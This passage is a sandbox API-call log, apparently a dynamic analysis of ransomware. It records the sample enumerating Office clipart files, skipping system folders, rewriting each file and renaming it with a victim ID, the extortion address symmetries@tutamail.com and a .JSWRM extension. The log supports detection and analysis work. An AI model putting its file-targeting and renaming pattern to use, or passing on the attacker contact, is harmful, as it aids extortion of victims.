[0086.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0086.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0086.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0086.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0086.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0086.445] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183174.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0183174.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183174.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0183174.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0086.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0086.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0086.446] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeaefe14, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeaefe14, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb1606f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5f6e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0183198.WMF", cAlternateFileName="")) returned 1 [0086.446] lstrcmpiW (lpString1="J0183198.WMF", lpString2=".") returned 1 [0086.446] lstrcmpiW (lpString1="J0183198.WMF", lpString2="..") returned 1 [0086.446] lstrcmpiW (lpString1="J0183198.WMF", lpString2="...") returned 1 [0086.447] lstrcmpiW (lpString1="J0183198.WMF", lpString2="windows") returned -1 [0086.447] lstrcmpiW (lpString1="J0183198.WMF", lpString2="recovery") returned -1 [0086.447] lstrcmpiW (lpString1="J0183198.WMF", lpString2="perflogs") returned -1 [0086.447] lstrcmpiW (lpString1="J0183198.WMF", lpString2="documents and settings") returned 1 [0086.447] lstrcmpiW (lpString1="J0183198.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.447] lstrcmpiW (lpString1="J0183198.WMF", lpString2="system volume information") returned -1 [0086.447] lstrcmpiW (lpString1="J0183198.WMF", lpString2="msocache") returned -1 [0086.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0086.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0183198.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0183198.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0183198.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0086.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0086.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0183198.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0183198.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0183198.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0086.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0086.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0086.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0086.447] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183198.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0183198.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.447] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=24430) returned 1 [0086.448] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5f60) returned 0x24d210 [0086.448] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5f60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5f60, lpOverlapped=0x0) returned 1 [0086.451] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.451] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5f60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5f60, lpOverlapped=0x0) returned 1 [0086.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.452] CloseHandle (hObject=0x314) returned 1 [0086.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0086.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0086.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0086.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0086.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0086.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0086.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0086.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0086.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0086.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0086.452] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183198.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0183198.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183198.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0183198.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0086.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0086.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0086.453] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeaefe14, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeaefe14, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb1606f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4b4a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0183574.WMF", cAlternateFileName="")) returned 1 [0086.453] lstrcmpiW (lpString1="J0183574.WMF", lpString2=".") returned 1 [0086.453] lstrcmpiW (lpString1="J0183574.WMF", lpString2="..") returned 1 [0086.453] lstrcmpiW (lpString1="J0183574.WMF", lpString2="...") returned 1 [0086.453] lstrcmpiW (lpString1="J0183574.WMF", lpString2="windows") returned -1 [0086.453] lstrcmpiW (lpString1="J0183574.WMF", lpString2="recovery") returned -1 [0086.453] lstrcmpiW (lpString1="J0183574.WMF", lpString2="perflogs") returned -1 [0086.453] lstrcmpiW (lpString1="J0183574.WMF", lpString2="documents and settings") returned 1 [0086.453] lstrcmpiW (lpString1="J0183574.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.453] lstrcmpiW (lpString1="J0183574.WMF", lpString2="system volume information") returned -1 [0086.453] lstrcmpiW (lpString1="J0183574.WMF", lpString2="msocache") returned -1 [0086.453] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0086.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0183574.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0183574.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0183574.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0086.453] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0086.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0183574.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0183574.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0183574.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0086.453] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0086.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0086.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0086.454] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183574.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0183574.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.454] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=19274) returned 1 [0086.454] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4b40) returned 0x24d210 [0086.455] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4b40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4b40, lpOverlapped=0x0) returned 1 [0086.457] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.457] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4b40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4b40, lpOverlapped=0x0) returned 1 [0086.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.457] CloseHandle (hObject=0x314) returned 1 [0086.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0086.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0086.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0086.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0086.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0086.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0086.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0086.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0086.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0086.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0086.458] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183574.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0183574.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183574.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0183574.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0086.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0086.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0086.458] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeaefe14, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeaefe14, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeaefe14, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1c88, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0185670.WMF", cAlternateFileName="")) returned 1 [0086.459] lstrcmpiW (lpString1="J0185670.WMF", lpString2=".") returned 1 [0086.459] lstrcmpiW (lpString1="J0185670.WMF", lpString2="..") returned 1 [0086.459] lstrcmpiW (lpString1="J0185670.WMF", lpString2="...") returned 1 [0086.459] lstrcmpiW (lpString1="J0185670.WMF", lpString2="windows") returned -1 [0086.459] lstrcmpiW (lpString1="J0185670.WMF", lpString2="recovery") returned -1 [0086.459] lstrcmpiW (lpString1="J0185670.WMF", lpString2="perflogs") returned -1 [0086.459] lstrcmpiW (lpString1="J0185670.WMF", lpString2="documents and settings") returned 1 [0086.459] lstrcmpiW (lpString1="J0185670.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.459] lstrcmpiW (lpString1="J0185670.WMF", lpString2="system volume information") returned -1 [0086.459] lstrcmpiW (lpString1="J0185670.WMF", lpString2="msocache") returned -1 [0086.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0086.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185670.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185670.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0185670.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0086.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0086.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185670.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185670.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0185670.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0086.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0086.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0086.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0086.459] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185670.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185670.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.498] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7304) returned 1 [0086.498] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1c80) returned 0x205850 [0086.498] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1c80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1c80, lpOverlapped=0x0) returned 1 [0086.500] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.500] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1c80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1c80, lpOverlapped=0x0) returned 1 [0086.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0086.500] CloseHandle (hObject=0x314) returned 1 [0086.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0086.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0086.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0086.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0086.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0086.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0086.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0086.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0086.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0086.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0086.501] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185670.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185670.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185670.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185670.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0086.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0086.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0086.502] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeaefe14, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeaefe14, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeaefe14, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4e46, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0185774.WMF", cAlternateFileName="")) returned 1 [0086.502] lstrcmpiW (lpString1="J0185774.WMF", lpString2=".") returned 1 [0086.502] lstrcmpiW (lpString1="J0185774.WMF", lpString2="..") returned 1 